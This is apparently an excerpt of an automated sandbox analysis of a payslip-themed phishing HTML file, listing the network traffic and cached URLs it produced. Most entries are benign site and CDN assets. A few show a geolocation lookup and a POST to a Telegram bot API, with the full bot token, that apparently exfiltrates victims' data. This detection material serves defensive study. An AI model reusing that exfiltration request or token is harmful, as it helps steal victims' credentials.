          Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /json/?fields=status,country,regionName,city,query HTTP/1.1Host: ip-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Origin: nullAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /json/?fields=status,country,regionName,city,query HTTP/1.1Host: ip-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlString found in binary or memory: <a class="m-SocialLinks__a-Icon--facebook" href="https://www.facebook.com/hgtv" target="_blank" aria-label="follow us on facebook"> equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: branched-versed-session.glitch.me
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: www.itnaledi.co.za
          Source: unknownHTTP traffic detected: POST /bot7615492389:AAFVZ9OmchXY56FM3hDvp-X0kY0cMmXg2qE/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveContent-Length: 335sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Content-Type: application/jsoncache-control: no-cachesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: chromecache_197.2.dr, chromecache_235.2.drString found in binary or memory: http://briancherne.github.io/jquery-hoverIntent/
          Source: chromecache_278.2.drString found in binary or memory: http://daneden.me/animate
          Source: chromecache_299.2.dr, chromecache_309.2.drString found in binary or memory: http://g.co/dev/maps-no-account
          Source: chromecache_252.2.dr, chromecache_312.2.drString found in binary or memory: http://go.wpbakery.com/licensing
          Source: chromecache_203.2.dr, chromecache_193.2.drString found in binary or memory: http://gsgd.co.uk/sandbox/jquery/easing/
          Source: chromecache_278.2.drString found in binary or memory: http://opensource.org/licenses/MIT
          Source: chromecache_299.2.dr, chromecache_309.2.drString found in binary or memory: http://www.broofa.com
          Source: chromecache_324.2.drString found in binary or memory: https://api.w.org/
          Source: chromecache_252.2.dr, chromecache_312.2.drString found in binary or memory: https://apis.google.com/js/plusone.js
          Source: chromecache_252.2.dr, chromecache_312.2.drString found in binary or memory: https://assets.pinterest.com/js/pinit.js
          Source: chromecache_309.2.drString found in binary or memory: https://developer.mozilla.org/docs/Web/API/EventTarget/addEventListener
          Source: chromecache_299.2.dr, chromecache_309.2.drString found in binary or memory: https://developers.google.com/maps/deprecations
          Source: chromecache_299.2.dr, chromecache_309.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/advanced-markers/migration
          Source: chromecache_152.2.dr, chromecache_160.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/error-messages
          Source: chromecache_283.2.dr, chromecache_150.2.dr, chromecache_254.2.dr, chromecache_306.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/error-messages#
          Source: chromecache_309.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browsers
          Source: chromecache_299.2.dr, chromecache_309.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/libraries
          Source: chromecache_309.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/styling#cloud_tooling
          Source: chromecache_152.2.dr, chromecache_160.2.drString found in binary or memory: https://developers.google.com/maps/documentation/javascript/webgl/support
          Source: chromecache_324.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: chromecache_324.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A500%2C700%7CQuestrial%3A400&#038;subset=latin&#038;
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS2mu1aB.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSCmu1aB.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSymu1aB.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2)
          Source: chromecache_325.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTVOmu1aB.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf70sCFlq20.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf70sSFlq20.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf70viFl.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
          Source: chromecache_151.2.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
          Source: chromecache_332.2.dr, chromecache_317.2.drString found in binary or memory: https://github.com/maxwellito/vivus
          Source: chromecache_299.2.dr, chromecache_309.2.drString found in binary or memory: https://goo.gle/js-api-loading
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlString found in binary or memory: https://instagram.com/hgtv
          Source: chromecache_258.2.dr, chromecache_314.2.drString found in binary or memory: https://maps.googleapis.com/maps-api-v3/api/js/59/1/geometry.js
          Source: chromecache_258.2.dr, chromecache_314.2.drString found in binary or memory: https://maps.googleapis.com/maps-api-v3/api/js/59/1/main.js
          Source: chromecache_258.2.dr, chromecache_314.2.drString found in binary or memory: https://maps.googleapis.com/maps-api-v3/api/js/59/1/search.js
          Source: chromecache_144.2.drString found in binary or memory: https://maps.googleapis.com/maps/api/js?client=google-maps-embed&amp;paint_origin=&amp;libraries=geo
          Source: chromecache_152.2.dr, chromecache_160.2.drString found in binary or memory: https://maps.googleapis.com/maps/api/mapsjs/mapConfigs:batchGet
          Source: chromecache_212.2.drString found in binary or memory: https://maps.gstatic.com/mapfiles/embed/images/entity11.png);background-size:70px
          Source: chromecache_212.2.drString found in binary or memory: https://maps.gstatic.com/mapfiles/embed/images/entity11_hdpi.png);background-size:70px
          Source: chromecache_212.2.drString found in binary or memory: https://maps.gstatic.com/mapfiles/embed/images/exp2.png);background-size:109px
          Source: chromecache_212.2.drString found in binary or memory: https://maps.gstatic.com/mapfiles/embed/images/exp2_hdpi.png);background-size:109px
          Source: chromecache_144.2.drString found in binary or memory: https://maps.gstatic.com/maps-api-v3/embed/js/59/1/init_embed.js
          Source: chromecache_324.2.drString found in binary or memory: https://schema.org
          Source: chromecache_144.2.drString found in binary or memory: https://search.google.com/local/reviews?placeid=ChIJVYt23o9czB0RnypH9BXsmnM
          Source: chromecache_299.2.dr, chromecache_309.2.drString found in binary or memory: https://support.google.com/fusiontables/answer/9185417).
          Source: chromecache_248.2.dr, chromecache_212.2.drString found in binary or memory: https://support.google.com/maps?p=kml
          Source: chromecache_214.2.drString found in binary or memory: https://themeforest.net/item/salient-responsive-multipurpose-theme/4363266
          Source: chromecache_214.2.drString found in binary or memory: https://themeforest.net/user/themenectar
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlString found in binary or memory: https://twitter.com/hgtv
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlString found in binary or memory: https://watch.hgtv.com/?utm_source=marketingsite&utm_medium=trendingline_watchfullseasons_text
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlString found in binary or memory: https://watch.hgtv.com/watch/hgtv?utm_source=marketingsite&utm_medium=livenow
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlString found in binary or memory: https://watch.hgtv.com/watch/hgtv?utm_source=marketingsite&utm_medium=sitenavigation
          Source: chromecache_252.2.dr, chromecache_312.2.drString found in binary or memory: https://wpbakery.com)
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlString found in binary or memory: https://www.discoveryplus.com/?xp=hgtv_nav_full_seasons%20
          Source: chromecache_283.2.dr, chromecache_150.2.drString found in binary or memory: https://www.google.com
          Source: chromecache_324.2.drString found in binary or memory: https://www.google.com/maps/embed?pb=
          Source: Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlString found in binary or memory: https://www.hgtv.com/about-us/hgtv-newsletters/
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/#breadcrumb
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/#website
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/?s=
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/comments/feed/
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/feed/
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/home/feed/
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.m
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/lib/bower/animate-css/anima
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/plugins/salient-core/js/third-party/touchswipe.min.js?ver=1.0
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/caroufredsel.min.js?v
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/plugins/salient-portfolio/js/third-party/imagesLoaded.min.js?v
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient-child/style.css?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-button-legacy.css?ve
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-clients.css?ver=15.0
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-fancy-unordered-list
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-milestone.css?ver=15
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-testimonial.css?ver=
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/grid-system.css?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/header/header-secondary-nav.css?ver=1
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/off-canvas/core.css?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/off-canvas/fullscreen-legacy.css?ver=
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/plugins/caroufredsel.css?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/plugins/magnific.css?ver=8.6.0
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/responsive.css?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/skin-material.css?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/style-non-critical.css?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/style.css?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/css/salient-dynamic-styles.css?ver=53858
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/elements/nectar-testimonial-slider.js?
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/init.js?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/priority.js?ver=15.0.6
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/anime.min.js?ver=4.5.1
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/hoverintent.min.js?ver=1.9
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/intersection-observer.min.
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/jquery.easing.min.js?ver=1
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/jquery.mousewheel.min.js?v
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/magnific.js?ver=7.0.1
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/superfish.js?ver=1.5.8
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/transit.min.js?ver=0.9.9
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/vivus.min.js?ver=6.0.1
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/waypoints.js?ver=4.0.2
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/IMAGE-1.jpg);
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-180x180.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-192x192.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-270x270.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/cropped-IT-ICON-32x32.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/logo-COLOUR.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/mission-blue.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/products2-300x211.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/products2.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/products3-300x211.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/02/products3.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/2-300x128.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/2.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/BYTES.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/DIMENSION.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/axis.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/building-industry.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/cape-nature.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/cape-union-mart.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/cherwell.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/chevron.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/cisco.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/city-of-cape-town.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/core.png
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/dell.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/dellemc.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/hp.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/ibm.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/image-1-300x128.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/image-1.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/is..jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/lewis.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/lexmark.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/marine-water.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/meat-market.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/mediclinic.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft-1-300x211.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft-1.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/microsoft.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/mmi-holdings.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/nec.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/palo-alto.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/petrosa.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/print-audit.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/site.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/superior.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/trend.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/03/western-cape.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/2018/11/yeastar.jpg
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-content/uploads/salient/menu-dynamic.css?ver=26058
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-includes/css/classic-themes.min.css?ver=1
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-includes/css/dist/block-library/style.min.css?ver=6.1.7
          Source: chromecache_324.2.drString found in binary or memory: https://www.itnaledi.co.za/wp-includes/js/comment-reply.min.js?ver=6.1.7
